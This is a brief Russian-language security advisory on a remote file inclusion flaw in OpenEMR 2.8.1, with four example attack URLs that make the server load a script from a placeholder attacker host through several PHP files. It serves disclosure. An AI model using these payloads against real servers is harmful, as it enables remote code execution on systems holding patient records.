• Партнер

  • Программа: OpenEMR 2.8.1

    Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных различными сценариями. Атакующий может выполнить произвольный сценарий на целевой системе в контексте безопасности запущенного Web сервера.

    Примеры:

    http://target.com/[OpenEMR-path]/interface/billing/ billing_process.php?srcdir=http://atacker.com/inject.txt?
    http://target.com/[OpenEMR-path]/interface/new/ new_patient_save.php?srcdir=http://atacker.com/inject.txt?
    http://target.com/[OpenEMR-path]/login.php?srcdir =http://atacker.com/inject.txt?
    http://target.com/[OpenEMR-path]/library/translation. inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?
     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии